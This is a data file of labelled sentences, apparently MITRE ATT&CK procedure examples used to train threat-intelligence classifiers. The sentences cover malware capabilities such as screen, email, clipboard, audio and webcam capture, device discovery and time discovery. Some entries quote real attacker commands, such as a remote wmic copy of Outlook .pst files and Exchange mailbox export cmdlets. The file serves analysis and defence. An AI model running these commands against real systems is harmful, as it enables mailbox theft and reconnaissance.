{"text1":"LitePower can take system screenshots and save them to `%AppData%`.","labels":"['T1113']"}
{"text1":"Lizar can take JPEG screenshots of an infected system.","labels":"['T1113']"}
{"text1":"LookBack can take desktop screenshots.","labels":"['T1113']"}
{"text1":"MacMa has used Apple\u2019s Core Graphic APIs, such as `CGWindowListCreateImageFromArray`, to capture the user's screen and open windows.","labels":"['T1113']"}
{"text1":"MacSpy can capture screenshots of the desktop over multiple monitors.","labels":"['T1113']"}
{"text1":"Machete captures screenshots.","labels":"['T1113']"}
{"text1":"Malware used by Group5 is capable of watching the victim's screen.","labels":"['T1113']"}
{"text1":"Matryoshka is capable of performing screen captures.","labels":"['T1113']"}
{"text1":"Metamorfo can collect screenshots of the victim\u2019s machine.","labels":"['T1113']"}
{"text1":"Micropsia takes screenshots every 90 seconds by calling the Gdi32.BitBlt API.","labels":"['T1113']"}
{"text1":"MuddyWater has used malware that can capture screenshots of the victim\u2019s machine.","labels":"['T1113']"}
{"text1":"NETWIRE can capture the victim's screen.","labels":"['T1113']"}
{"text1":"ObliqueRAT can capture a screenshot of the current screen.","labels":"['T1113']"}
|
|
{"text1":"OilRig has a tool called CANDYKING to capture a screenshot of user's desktop.","labels":"['T1113']"}
|
|
{"text1":"POORAIM can perform screen capturing.","labels":"['T1113']"}
|
|
{"text1":"POWRUNER can capture a screenshot from a victim.","labels":"['T1113']"}
|
|
{"text1":"PcShare can take screen shots of a compromised machine.","labels":"['T1113']"}
|
|
{"text1":"Peppy can take screenshots on targeted systems.","labels":"['T1113']"}
|
|
{"text1":"PoetRAT has the ability to take screen captures.","labels":"['T1113']"}
|
|
{"text1":"Prikormka contains a module that captures screenshots of the victim's desktop.","labels":"['T1113']"}
|
|
{"text1":"Proton captures the content of the desktop with the screencapture binary.","labels":"['T1113']"}
|
|
{"text1":"Pteranodon can capture screenshots at a configurable interval.","labels":"['T1113']"}
|
|
{"text1":"Pupy can drop a mouse-logger that will take small screenshots at each click and then send them back to the server.","labels":"['T1113']"}
|
|
{"text1":"QuietSieve has taken screenshots every five minutes and saved them to the user's local Application Data folder under `Temp\\SymbolSourceSymbols\\icons` or `Temp\\ModeAuto\\icons`.","labels":"['T1113']"}
|
|
{"text1":"RCSession can capture screenshots from a compromised host.","labels":"['T1113']"}
|
|
{"text1":"RDAT can take a screenshot on the infected system.","labels":"['T1113']"}
|
|
{"text1":"ROKRAT can capture screenshots of the infected system using the `gdi32` library.","labels":"['T1113']"}
|
|
{"text1":"RTM can capture screenshots.","labels":"['T1113']"}
|
|
{"text1":"Remexi takes screenshots of windows of interest.","labels":"['T1113']"}
|
|
{"text1":"RemoteUtilities can take screenshots on a compromised host.","labels":"['T1113']"}
|
|
{"text1":"RogueRobin has a command named \"$screenshot\" that may be responsible for taking screenshots of the victim machine.","labels":"['T1113']"}
|
|
{"text1":"Rover takes screenshots of the compromised system's desktop and saves them to \"C:\\system\\screenshot.bmp\" for exfiltration every 60 minutes.","labels":"['T1113']"}
|
|
{"text1":"SHUTTERSPEED can capture screenshots.","labels":"['T1113']"}
|
|
{"text1":"SILENTTRINITY can take a screenshot of the current desktop.","labels":"['T1113']"}
|
|
{"text1":"SLOTHFULMEDIA has taken a screenshot of a victim's desktop, named it \"Filter3.jpg\", and stored it in the local directory.","labels":"['T1113']"}
|
|
{"text1":"SMOKEDHAM can capture screenshots of the victim\u2019s desktop.","labels":"['T1113']"}
|
|
{"text1":"SharpStage has the ability to capture the victim's screen.","labels":"['T1113']"}
|
|
{"text1":"Silence can capture victim screen activity.","labels":"['T1113']"}
|
|
{"text1":"Sliver can take screenshots of the victim\u2019s active display.","labels":"['T1113']"}
|
|
{"text1":"Socksbot can take screenshots.","labels":"['T1113']"}
|
|
{"text1":"StoneDrill can take screenshots.","labels":"['T1113']"}
|
|
{"text1":"SysUpdate has the ability to capture screenshots.","labels":"['T1113']"}
|
|
{"text1":"T9000 can take screenshots of the desktop and target application windows, saving them to user directories as one-byte XOR-encrypted .dat files.","labels":"['T1113']"}
|
|
{"text1":"TURNEDUP is capable of taking screenshots.","labels":"['T1113']"}
|
|
{"text1":"TajMahal has the ability to take screenshots on an infected host including capturing content from windows of instant messaging applications.","labels":"['T1113']"}
|
|
{"text1":"The FunnyDream ScreenCap component can take screenshots on a compromised host.","labels":"['T1113']"}
|
|
{"text1":"TinyZBot contains screen capture functionality.","labels":"['T1113']"}
|
|
{"text1":"Trojan.Karagany can take a desktop screenshot and save the file into \"\\ProgramData\\Mail\\MailAg\\shot.png\".","labels":"['T1113']"}
|
|
{"text1":"Turian has the ability to take screenshots.","labels":"['T1113']"}
|
|
{"text1":"Ursnif has used hooked APIs to take screenshots.","labels":"['T1113']"}
|
|
{"text1":"VERMIN can perform screen captures of the victim\u2019s machine.","labels":"['T1113']"}
|
|
{"text1":"Valak has the ability to take screenshots on a compromised host.","labels":"['T1113']"}
|
|
{"text1":"XAgentOSX contains the takeScreenShot (along with startTakeScreenShot and stopTakeScreenShot) functions to take screenshots using the CGGetActiveDisplayList, CGDisplayCreateImage, and NSImage:initWithCGImage methods.","labels":"['T1113']"}
|
|
{"text1":"XCSSET saves a screen capture of the victim's system with a numbered filename and \".jpg\" extension. Screen captures are taken at specified intervals based on the system.","labels":"['T1113']"}
|
|
{"text1":"ZLib has the ability to obtain screenshots of the compromised system.","labels":"['T1113']"}
|
|
{"text1":"ZxShell can capture screenshots.","labels":"['T1113']"}
|
|
{"text1":"jRAT has the capability to take screenshots of the victim\u2019s machine.","labels":"['T1113']"}
|
|
{"text1":"njRAT can capture screenshots of the victim\u2019s machines.","labels":"['T1113']"}
|
|
{"text1":"yty collects screenshots of the victim machine.","labels":"['T1113']"}
|
|
{"text1":"Magic Hound has compromised email credentials in order to steal sensitive data.","labels":"['T1114']"}
|
|
{"text1":"Silent Librarian has exfiltrated entire mailboxes from compromised accounts.","labels":"['T1114']"}
|
|
{"text1":"APT1 uses two utilities, GETMAIL and MAPIGET, to steal email. GETMAIL extracts emails from archived Outlook .pst files.","labels":"['T1114.001']"}
|
|
{"text1":"Carbanak searches recursively for Outlook personal storage tables (PST) files within user directories and sends them back to the C2 server.","labels":"['T1114.001']"}
|
|
{"text1":"Chimera has harvested data from victim's e-mail including through execution of \"wmic \/node:<ip> process call create \"cmd \/c copy c:\\Users\\<username>\\<path>\\backup.pst c:\\windows\\temp\\backup.pst\" copy \"i:\\<path>\\<username>\\My Documents\\<filename>.pst\"\ncopy\".","labels":"['T1114.001']"}
|
|
{"text1":"CosmicDuke searches for Microsoft Outlook data files with extensions .pst and .ost for collection and exfiltration.","labels":"['T1114.001']"}
|
|
{"text1":"Crimson contains a command to collect and exfiltrate emails from Outlook.","labels":"['T1114.001']"}
|
|
{"text1":"Emotet has been observed leveraging a module that scrapes email data from Outlook.","labels":"['T1114.001']"}
|
|
{"text1":"Empire has the ability to collect emails on a target system.","labels":"['T1114.001']"}
|
|
{"text1":"Magic Hound has collected .PST archives.","labels":"['T1114.001']"}
|
|
{"text1":"Pupy can interact with a victim\u2019s Outlook session and look through folders and emails.","labels":"['T1114.001']"}
|
|
{"text1":"QakBot can target and steal locally stored emails to support thread hijacking phishing campaigns.","labels":"['T1114.001']"}
|
|
{"text1":"Smoke Loader searches through Outlook files and directories (e.g., inbox, sent, templates, drafts, archives, etc.).","labels":"['T1114.001']"}
|
|
{"text1":"APT28 has collected emails from victim Microsoft Exchange servers.","labels":"['T1114.002']"}
|
|
{"text1":"APT29 collected emails from specific individuals, such as executives and IT staff, using \"New-MailboxExportRequest\" followed by \"Get-MailboxExportRequest\".","labels":"['T1114.002']"}
|
|
{"text1":"Chimera has harvested data from remote mailboxes including through execution of \"\\\\<hostname>\\c$\\Users\\<username>\\AppData\\Local\\Microsoft\\Outlook*.ost\".","labels":"['T1114.002']"}
|
|
{"text1":"Dragonfly 2.0 accessed email accounts using Outlook Web Access.","labels":"['T1114.002']"}
|
|
{"text1":"FIN4 has accessed and hijacked online email communications using stolen credentials.","labels":"['T1114.002']"}
|
|
{"text1":"HAFNIUM has used web shells to export mailbox data.","labels":"['T1114.002']"}
|
|
{"text1":"Ke3chang has used compromised credentials and a .NET tool to dump data from Microsoft Exchange mailboxes.","labels":"['T1114.002']"}
|
|
{"text1":"Kimsuky has used tools such as the MailFetch mail crawler to collect victim emails (excluding spam) from online services via IMAP.","labels":"['T1114.002']"}
|
|
{"text1":"Leafminer used a tool called MailSniper to search through the Exchange server mailboxes for keywords.","labels":"['T1114.002']"}
|
|
{"text1":"LightNeuron collects Exchange emails matching rules specified in its configuration.","labels":"['T1114.002']"}
|
|
{"text1":"Magic Hound has exported emails from compromised Exchange servers.","labels":"['T1114.002']"}
|
|
{"text1":"MailSniper can be used for searching through email in Exchange and Office 365 environments.","labels":"['T1114.002']"}
|
|
{"text1":"UNC2452 collected emails from specific individuals, such as executives and IT staff, using \"New-MailboxExportRequest\" followed by \"Get-MailboxExportRequest\".","labels":"['T1114.002']"}
|
|
{"text1":"Valak can collect sensitive mailing information from Exchange servers, including credentials and the domain certificate of an enterprise.","labels":"['T1114.002']"}
|
|
{"text1":"Kimsuky has set auto-forward rules on victim's e-mail accounts.","labels":"['T1114.003']"}
|
|
{"text1":"LAPSUS$ has set an Office 365 tenant level mail transport rule to send all mail in and out of the targeted organization to the newly created account.","labels":"['T1114.003']"}
|
|
{"text1":"Silent Librarian has set up auto forwarding rules on compromised e-mail accounts.","labels":"['T1114.003']"}
|
|
{"text1":"A JHUHUGIT variant accesses a screenshot saved in the clipboard and converts it to a JPG image.","labels":"['T1115']"}
|
|
{"text1":"APT38 used a Trojan called KEYLIME to collect data from the clipboard.","labels":"['T1115']"}
|
|
{"text1":"APT39 has used tools capable of stealing contents of the clipboard.","labels":"['T1115']"}
|
|
{"text1":"Agent Tesla can steal data from the victim\u2019s clipboard.","labels":"['T1115']"}
|
|
{"text1":"Attor has a plugin that collects data stored in the Windows clipboard by using the OpenClipboard and GetClipboardData APIs.","labels":"['T1115']"}
|
|
{"text1":"Cadelspy has the ability to steal data from the clipboard.","labels":"['T1115']"}
|
|
{"text1":"Catchamas steals data stored in the clipboard.","labels":"['T1115']"}
|
|
{"text1":"Clambling has the ability to capture and store clipboard data.","labels":"['T1115']"}
|
|
{"text1":"CosmicDuke copies and exfiltrates the clipboard contents every 30 seconds.","labels":"['T1115']"}
|
|
{"text1":"DarkComet can steal data from the clipboard.","labels":"['T1115']"}
|
|
{"text1":"Empire can harvest clipboard data on both Windows and macOS systems.","labels":"['T1115']"}
|
|
{"text1":"Explosive has a function to use the OpenClipboard wrapper.","labels":"['T1115']"}
|
|
{"text1":"FlawedAmmyy can collect clipboard data.","labels":"['T1115']"}
|
|
{"text1":"KONNI had a feature to steal data from the clipboard.","labels":"['T1115']"}
|
|
{"text1":"MacSpy can steal clipboard contents.","labels":"['T1115']"}
|
|
{"text1":"Machete hijacks the clipboard data by creating an overlapped window that listens to keyboard events.","labels":"['T1115']"}
|
|
{"text1":"MarkiRAT can capture clipboard content.","labels":"['T1115']"}
|
|
{"text1":"Melcoz can monitor content saved to the clipboard.","labels":"['T1115']"}
|
|
{"text1":"Metamorfo has a function to hijack data from the clipboard by monitoring the contents of the clipboard and replacing the cryptocurrency wallet with the attacker's.","labels":"['T1115']"}
|
|
{"text1":"Operation Wocao has collected clipboard data in plaintext.","labels":"['T1115']"}
|
|
{"text1":"ROKRAT can extract clipboard data from a compromised host.","labels":"['T1115']"}
|
|
{"text1":"Remcos steals and modifies data from the clipboard.","labels":"['T1115']"}
|
|
{"text1":"Remexi collects text from the clipboard.","labels":"['T1115']"}
|
|
{"text1":"The executable version of Helminth has a module to log clipboard contents.","labels":"['T1115']"}
|
|
{"text1":"TinyZBot contains functionality to collect information from the clipboard.","labels":"['T1115']"}
|
|
{"text1":"VERMIN collects data stored in the clipboard.","labels":"['T1115']"}
|
|
{"text1":"jRAT can capture clipboard data.","labels":"['T1115']"}
|
|
{"text1":"A Helminth VBScript receives a batch script to execute a set of commands in a command prompt.","labels":"['T1119']"}
|
|
{"text1":"APT1 used a batch script to perform a series of discovery techniques and save the output to a text file.","labels":"['T1119']"}
|
|
{"text1":"APT28 used a publicly available tool to gather and compress multiple documents on the DCCC and DNC networks.","labels":"['T1119', 'T1560']"}
|
|
{"text1":"AppleSeed has automatically collected data from USB drives, keystrokes, and screen images before exfiltration.","labels":"['T1119']"}
|
|
{"text1":"Attor has automatically collected data about the compromised system.","labels":"['T1119']"}
|
|
{"text1":"BADNEWS monitors USB devices and copies files with certain extensions to a predefined directory.","labels":"['T1119']"}
|
|
{"text1":"Bankshot recursively generates a list of files within a directory and sends them back to the control server.","labels":"['T1119']"}
|
|
{"text1":"Confucius has used a file stealer to steal documents and images with the following extensions: txt, pdf, png, jpg, doc, xls, xlm, odp, ods, odt, rtf, ppt, xlsx, xlsm, docx, pptx, and jpeg.","labels":"['T1119']"}
|
|
{"text1":"During Frankenstein, the threat actors used Empire to automatically gather the username, domain name, machine name, and other system information.","labels":"['T1119']"}
|
|
{"text1":"During Operation Wocao, threat actors used a script to collect information about the infected system.","labels":"['T1119']"}
|
|
{"text1":"FIN6 has used a script to iterate through a list of compromised PoS systems, copy and remove data to a log file, and to bind to events from the submit payment button.","labels":"['T1119']"}
|
|
{"text1":"For all non-removable drives on a victim, USBStealer executes automated collection of certain files for later exfiltration.","labels":"['T1119']"}
|
|
{"text1":"Frankenstein has enumerated hosts via Empire, gathering the username, domain name, machine name, and other system information.","labels":"['T1119']"}
|
|
{"text1":"FunnyDream can monitor files for changes and automatically collect them.","labels":"['T1119']"}
|
|
{"text1":"Gamaredon Group has deployed scripts on compromised systems that automatically scan for interesting documents.","labels":"['T1119']"}
|
|
{"text1":"GoldFinder logged and stored information related to the route or hops a packet took from a compromised machine to a hardcoded C2 server, including the target C2 URL, HTTP response\/status code, HTTP response headers and values, and data received from the C2 node.","labels":"['T1119']"}
|
|
{"text1":"InvisiMole can sort and collect specific documents as well as generate a list of all files on a newly inserted drive and store them in an encrypted file.","labels":"['T1119']"}
|
|
{"text1":"Ke3chang has performed frequent and scheduled data collection from victim networks.","labels":"['T1119']"}
|
|
{"text1":"MESSAGETAP checks two files, keyword_parm.txt and parm.txt, for instructions on how to target and save data parsed and extracted from SMS message data in the network traffic. If an SMS message contains a phone number, IMSI number, or keyword that matches the predefined list, it is saved to a CSV file for later theft by the threat actor.","labels":"['T1119']"}
|
|
{"text1":"Metamorfo has automatically collected mouse clicks, continuous screenshots on the machine, and set timers to collect the contents of the clipboard and website browsing.","labels":"['T1119']"}
|
|
{"text1":"Micropsia executes a RAR tool to recursively archive files based on a predefined list of file extensions (*.xls, *.xlsx, *.csv, *.odt, *.doc, *.docx, *.ppt, *.pptx, *.pdf, *.mdb, *.accdb, *.accde, *.txt).","labels":"['T1119']"}
|
|
{"text1":"Mustang Panda used custom batch scripts to collect files automatically from a targeted system.","labels":"['T1119']"}
|
|
{"text1":"OilRig has used automated collection.","labels":"['T1119']"}
|
|
{"text1":"OutSteel can automatically scan for and collect files with specific extensions.","labels":"['T1119']"}
|
|
{"text1":"Patchwork developed a file stealer to search C:\\ and collect files with certain extensions. Patchwork also executed a script to enumerate all drives, store them as a list, and upload generated files to the C2 server.","labels":"['T1119']"}
|
|
{"text1":"PoetRAT used file system monitoring to track modification and enable automatic exfiltration.","labels":"['T1119']"}
|
|
{"text1":"PoshC2 contains a module for recursively parsing through files and directories to gather valid credit card numbers.","labels":"['T1119']"}
|
|
{"text1":"RTM monitors browsing activity and automatically captures screenshots if a victim browses to a URL matching one of a list of strings.","labels":"['T1119']"}
|
|
{"text1":"Ramsay can conduct an initial scan for Microsoft Word documents on the local system, removable media, and connected network drives, before tagging and collecting them. It can continue tagging documents to collect with follow up scans.","labels":"['T1119']"}
|
|
{"text1":"Sidewinder has used tools to automatically collect system and network configuration information.","labels":"['T1119']"}
|
|
{"text1":"StrongPity has a file searcher component that can automatically collect and archive files based on a predefined list of file extensions.","labels":"['T1119']"}
|
|
{"text1":"TajMahal has the ability to index and compress files into a send queue for exfiltration.","labels":"['T1119']"}
|
|
{"text1":"VERMIN saves each collected file with the automatically generated format {0:dd-MM-yyyy}.txt.","labels":"['T1119']"}
|
|
{"text1":"Valak can download a module to search for and build a report of harvested credential data.","labels":"['T1119']"}
|
|
{"text1":"WindTail can identify and add files that possess specific file extensions to an array for archiving.","labels":"['T1119']"}
|
|
{"text1":"Zebrocy scans the system and automatically collects files with the following extensions: .doc, .docx, .xls, .xlsx, .pdf, .pptx, .rar, .zip, .jpg, .jpeg, .bmp, .tiff, .kum, .tlg, .sbx, .cr, .hse, .hsf, and .lhz.","labels":"['T1119']"}
|
|
{"text1":"ccf32 can be used to automatically collect files from a compromised host.","labels":"['T1119']"}
|
|
{"text1":"ADVSTORESHELL can list connected devices.","labels":"['T1120']"}
|
|
{"text1":"APT28 uses a module to receive a notification every time a USB mass storage device is inserted into a victim.","labels":"['T1120']"}
|
|
{"text1":"APT37 has a Bluetooth device harvester, which uses Windows Bluetooth APIs to find information on connected Bluetooth devices.","labels":"['T1120']"}
|
|
{"text1":"Attor has a plugin that collects information about inserted storage devices, modems, and phone devices.","labels":"['T1120']"}
|
|
{"text1":"BADNEWS checks for new hard drives on the victim, such as USB devices, by listening for the WM_DEVICECHANGE window message.","labels":"['T1120']"}
|
|
{"text1":"BackdoorDiplomacy has used an executable to detect removable media, such as USB flash drives.","labels":"['T1120']"}
|
|
{"text1":"Bandook can detect USB devices.","labels":"['T1120']"}
|
|
{"text1":"BlackEnergy can gather very specific information about attached USB devices, to include device instance ID and drive geometry.","labels":"['T1120']"}
|
|
{"text1":"Cadelspy has the ability to steal information about printers and the documents sent to printers.","labels":"['T1120']"}
|
|
{"text1":"Crimson has the ability to discover pluggable\/removable drives to extract files from.","labels":"['T1120']"}
|
|
{"text1":"Crutch can monitor for removable drives being plugged into the compromised machine.","labels":"['T1120']"}
|
|
{"text1":"During Operation Wocao, threat actors discovered removable disks attached to a system.","labels":"['T1120']"}
|
|
{"text1":"DustySky can detect connected USB devices.","labels":"['T1120']"}
|
|
{"text1":"Equation has used tools with the functionality to search for specific information about the attached hard drive that could be used to identify and overwrite the firmware.","labels":"['T1120']"}
|
|
{"text1":"Ferocious can run \"GET.WORKSPACE\" in Microsoft Excel to check if a mouse is present.","labels":"['T1120']"}
|
|
{"text1":"FlawedAmmyy will attempt to detect if a usable smart card is currently inserted into a card reader.","labels":"['T1120']"}
|
|
{"text1":"Mongall can identify removable media attached to compromised hosts.","labels":"['T1120']"}
|
|
{"text1":"MoonWind obtains the number of removable drives from the victim.","labels":"['T1120']"}
|
|
{"text1":"ObliqueRAT can discover pluggable\/removable drives to extract files from.","labels":"['T1120']"}
|
|
{"text1":"OilRig has used tools to identify if a mouse is connected to a targeted system.","labels":"['T1120']"}
|
|
{"text1":"Operation Wocao has discovered removable disks attached to a system.","labels":"['T1120']"}
|
|
{"text1":"QakBot can identify peripheral devices on targeted systems.","labels":"['T1120']"}
|
|
{"text1":"QuietSieve can identify and search removable drives for specific file name extensions.","labels":"['T1120']"}
|
|
{"text1":"RTM can obtain a list of smart card readers attached to the victim.","labels":"['T1120']"}
|
|
{"text1":"Ragnar Locker may attempt to connect to removable drives and mapped network drives.","labels":"['T1120']"}
|
|
{"text1":"Ramsay can scan for removable media which may contain documents for collection.","labels":"['T1120']"}
|
|
{"text1":"Stuxnet enumerates removable drives for infection.","labels":"['T1120']"}
|
|
{"text1":"T9000 searches through connected drives for removable storage devices.","labels":"['T1120']"}
|
|
{"text1":"TajMahal has the ability to identify connected Apple devices.","labels":"['T1120']"}
|
|
{"text1":"TeamTNT has searched for attached VGA devices using lspci.","labels":"['T1120']"}
|
|
{"text1":"Turla has used \"fsutil fsinfo drives\" to list connected drives.","labels":"['T1120']"}
|
|
{"text1":"USBStealer monitors victims for insertion of removable drives. When dropped onto a second victim, it also enumerates drives connected to the system.","labels":"['T1120']"}
|
|
{"text1":"USBferry can check for connected USB devices.","labels":"['T1120']"}
|
|
{"text1":"WannaCry contains a thread that will attempt to scan for new attached drives every few seconds. If one is identified, it will encrypt the files on the attached device.","labels":"['T1120']"}
|
|
{"text1":"WastedLocker can enumerate removable drives prior to the encryption process.","labels":"['T1120']"}
|
|
{"text1":"XAgentOSX contains the showBackupIosFolder function to check for iOS device backups by running \"ls -la ~\/Library\/Application\\ Support\/MobileSync\/Backup\/\".","labels":"['T1120']"}
|
|
{"text1":"Zebrocy enumerates information about connected storage devices.","labels":"['T1120']"}
|
|
{"text1":"jRAT can map UPnP ports.","labels":"['T1120']"}
|
|
{"text1":"APT37 has used an audio capturing utility known as SOUNDWAVE that captures microphone input.","labels":"['T1123']"}
|
|
{"text1":"Attor has a plugin that is capable of recording audio using available input sound devices.","labels":"['T1123']"}
|
|
{"text1":"Cadelspy has the ability to record audio from the compromised host.","labels":"['T1123']"}
|
|
{"text1":"Cobian RAT has a feature to perform voice recording on the victim\u2019s machine.","labels":"['T1123']"}
|
|
{"text1":"Crimson can perform audio surveillance using microphones.","labels":"['T1123']"}
|
|
{"text1":"DOGCALL can capture microphone data from the victim's machine.","labels":"['T1123']"}
|
|
{"text1":"DarkComet can listen in to victims' conversations through the system\u2019s microphone.","labels":"['T1123']"}
|
|
{"text1":"EvilGrab has the capability to capture audio from a victim machine.","labels":"['T1123']"}
|
|
{"text1":"Flame can record audio using any existing hardware recording devices.","labels":"['T1123']"}
|
|
{"text1":"InvisiMole can record sound using input audio devices.","labels":"['T1123']"}
|
|
{"text1":"Janicab captured audio and sent it out to a C2 server.","labels":"['T1123']"}
|
|
{"text1":"MacMa has the ability to record audio.","labels":"['T1123']"}
|
|
{"text1":"MacSpy can record the sounds from microphones on a computer.","labels":"['T1123']"}
|
|
{"text1":"Machete captures audio from the computer\u2019s microphone.","labels":"['T1123']"}
|
|
{"text1":"NanoCore can capture audio feeds from the system.","labels":"['T1123']"}
|
|
{"text1":"Pupy can record sound with the microphone.","labels":"['T1123']"}
|
|
{"text1":"ROKRAT has an audio capture and eavesdropping module.","labels":"['T1123']"}
|
|
{"text1":"Remcos can capture data from the system\u2019s microphone.","labels":"['T1123']"}
|
|
{"text1":"Revenge RAT has a plugin for microphone interception.","labels":"['T1123']"}
|
|
{"text1":"T9000 uses the Skype API to record audio and video calls. It writes encrypted data to \"%APPDATA%\\Intel\\Skype\".","labels":"['T1123', 'T1125']"}
|
|
{"text1":"TajMahal has the ability to capture VoiceIP application audio on an infected host.","labels":"['T1123']"}
|
|
{"text1":"VERMIN can perform audio capture.","labels":"['T1123']"}
|
|
{"text1":"jRAT can capture microphone recordings.","labels":"['T1123']"}
|
|
{"text1":"AppleSeed can pull a timestamp from the victim's machine.","labels":"['T1124']"}
|
|
{"text1":"As part of the data reconnaissance phase, Proxysvc grabs the system time to send back to the control server.","labels":"['T1124']"}
|
|
{"text1":"Astaroth collects the timestamp from the infected machine.","labels":"['T1124']"}
|
|
{"text1":"BRONZE BUTLER has used \"net time\" to check the local time on a target system.","labels":"['T1124']"}
|
|
{"text1":"BendyBear has the ability to determine local time on a compromised host.","labels":"['T1124']"}
|
|
{"text1":"Bisonal can check the system time set on the infected host.","labels":"['T1124']"}
|
|
{"text1":"Carbon uses the command \"net time \\\\127.0.0.1\" to get information about the system\u2019s time.","labels":"['T1124']"}
|
|
{"text1":"Chimera has used \"time \/t\" and \"net time \\\\ip\/hostname\" for system time discovery.","labels":"['T1124']"}
|
|
{"text1":"Clambling can determine the current time.","labels":"['T1124']"}
|
|
{"text1":"ComRAT has checked the victim system's date and time to perform tasks during business hours (9 to 5, Monday to Friday).","labels":"['T1124']"}
|
|
{"text1":"Conficker uses the current UTC victim system date for domain generation and connects to time servers to determine the current date.","labels":"['T1124']"}
|
|
{"text1":"DCSrv can compare the current time on an infected host with a configuration value to determine when to start the encryption process.","labels":"['T1124']"}
|
|
{"text1":"DRATzarus can use the `GetTickCount` and `GetSystemTimeAsFileTime` API calls to inspect system time.","labels":"['T1124']"}
|
|
{"text1":"DarkWatchman can collect the time zone information from the system.","labels":"['T1124']"}
|
|
{"text1":"Darkhotel malware can obtain system time from a compromised host.","labels":"['T1124']"}
|
|
{"text1":"During C0015, the threat actors used the command `net view \/all time` to gather the local time of a compromised network.","labels":"['T1124']"}
|
|
{"text1":"During Operation CuckooBees, the threat actors used the `net time` command as part of their advanced reconnaissance.","labels":"['T1124']"}
|
|
{"text1":"Egregor contains functionality to query the local\/system time.","labels":"['T1124']"}
|
|
{"text1":"Epic uses the \"net time\" command to get the system time from the machine and collect the current date and time zone information.","labels":"['T1124']"}
|
|
{"text1":"FunnyDream can check system time to help determine when changes were made to specified files.","labels":"['T1124']"}
|
|
{"text1":"GRIFFON has used a reconnaissance module that can be used to retrieve the date and time of the system.","labels":"['T1124']"}
|
|
{"text1":"GoldMax can check the current date-time value of the compromised system, comparing it to the hardcoded execution trigger and can send the current timestamp to the C2 server.","labels":"['T1124']"}
|
|
{"text1":"Grandoreiro can determine the time on the victim machine via IPinfo.","labels":"['T1124']"}
|
|
{"text1":"GravityRAT can obtain the date and time of a system.","labels":"['T1124']"}
|
|
{"text1":"Green Lambert can collect the date and time from a compromised host.","labels":"['T1124']"}
|
|
{"text1":"HOPLIGHT has been observed collecting system time from victim machines.","labels":"['T1124']"}
|
|
{"text1":"Higaisa used a function to gather the current time.","labels":"['T1124']"}
|
|
{"text1":"Metamorfo uses JavaScript to get the system time.","labels":"['T1124']"}
|
|
{"text1":"NOKKI can collect the current timestamp of the victim's machine.","labels":"['T1124']"}
|
|
{"text1":"Okrum can obtain the date and time of the compromised system.","labels":"['T1124']"}
|
|
{"text1":"PipeMon can send time zone information from a compromised host to C2.","labels":"['T1124']"}
|
|
{"text1":"PowerDuke has commands to get the time the machine was built, the time, and the time zone.","labels":"['T1124']"}
|
|
{"text1":"QakBot can identify the system time on a targeted host.","labels":"['T1124']"}
|
|
{"text1":"SILENTTRINITY can collect start time information from a compromised host.","labels":"['T1124']"}
|
|
{"text1":"SombRAT can execute \"getinfo\" to discover the current time on a compromised host.","labels":"['T1124']"}
|
|
{"text1":"StoneDrill can obtain the current date and time of the victim machine.","labels":"['T1124']"}
|
|
{"text1":"StrifeWater can collect the time zone from the victim's machine.","labels":"['T1124']"}
|
|
{"text1":"Stuxnet collects the time and date of a system when it is infected.","labels":"['T1124']"}
|
|
{"text1":"TAINTEDSCRIBE can execute \"GetLocalTime\" for time discovery.","labels":"['T1124']"}
|
|
{"text1":"Taidoor can use \"GetLocalTime\" and \"GetSystemTime\" to collect system time.","labels":"['T1124']"}
|
|
{"text1":"The White Company has checked the current date on the victim system.","labels":"['T1124']"}
|
|
{"text1":"Turla surveys a system upon check-in to discover the system time by using the \"net time\" command.","labels":"['T1124']"}
|
|
{"text1":"UPPERCUT has the capability to obtain the time zone information and current timestamp of the victim\u2019s machine.","labels":"['T1124']"}
|
|
{"text1":"WindTail has the ability to generate the current date and time.","labels":"['T1124']"}
|
|
{"text1":"ZIRCONIUM has used a tool to capture the time on a compromised host in order to register it with C2.","labels":"['T1124']"}
|
|
{"text1":"Zebrocy gathers the current time zone and date information from the system.","labels":"['T1124']"}
|
|
{"text1":"build_downer has the ability to determine the local time to ensure malware installation only happens during the hours that the infected system is active.","labels":"['T1124']"}
|
|
{"text1":"Agent Tesla can access the victim\u2019s webcam and record video.","labels":"['T1125']"}
|
|
{"text1":"Bandook has modules that are capable of capturing video from a victim's webcam.","labels":"['T1125']"}
|
|
{"text1":"Clambling can record screen content in AVI format.","labels":"['T1125']"}
|
|
{"text1":"ConnectWise can record video on remote hosts.","labels":"['T1125']"}
|
|
{"text1":"Crimson can capture webcam video on targeted systems.","labels":"['T1125']"}
|
|
{"text1":"DarkComet can access the victim\u2019s webcam to take pictures.","labels":"['T1125']"}
|
|
{"text1":"Empire can capture webcam data on Windows and macOS systems.","labels":"['T1125']"}
|
|
{"text1":"EvilGrab has the capability to capture video from a victim machine.","labels":"['T1125']"}
|
|
{"text1":"FIN7 created a custom video recording capability that could be used to monitor operations in the victim's environment.","labels":"['T1125']"}
|
|
{"text1":"Imminent Monitor has a remote webcam monitoring capability.","labels":"['T1125']"}
|
|
{"text1":"InvisiMole can remotely activate the victim\u2019s webcam to capture content.","labels":"['T1125']"}
|
|
{"text1":"Kazuar captures images from the webcam.","labels":"['T1125']"}
|
|
{"text1":"NanoCore can access the victim's webcam and capture data.","labels":"['T1125']"}
|
|
{"text1":"ObliqueRAT can capture images from webcams on compromised hosts.","labels":"['T1125']"}
|
|
{"text1":"PcShare can capture camera video as part of its collection process.","labels":"['T1125']"}
|
|
{"text1":"PoetRAT has used a Python tool named Bewmac to record the webcam on compromised hosts.","labels":"['T1125']"}
|
|
{"text1":"QuasarRAT can perform webcam viewing.","labels":"['T1125']"}
|
|
{"text1":"Remcos can access a system\u2019s webcam and take pictures.","labels":"['T1125']"}
|
|
{"text1":"SDBbot has the ability to record video on a compromised host.","labels":"['T1125']"}
|
|
{"text1":"TajMahal has the ability to capture webcam video.","labels":"['T1125']"}
|
|
{"text1":"WarzoneRAT can access the webcam on a victim's machine.","labels":"['T1125']"}
|
|
{"text1":"ZxShell has a command to perform video device spying.","labels":"['T1125']"}
|
|
{"text1":"jRAT has the capability to capture video from a webcam.","labels":"['T1125']"}
|
|
{"text1":"A version of PlugX loads as shellcode within a .NET Framework project using msbuild.exe, presumably to bypass application whitelisting techniques.","labels":"['T1127']"}
|
|
{"text1":"Empire can use built-in modules to abuse trusted utilities like MSBuild.exe.","labels":"['T1127', 'T1127.001']"}
|
|
{"text1":"A version of PlugX loads as shellcode within a .NET Framework project using msbuild.exe, presumably to bypass application control techniques.","labels":"['T1127.001']"}
|
|
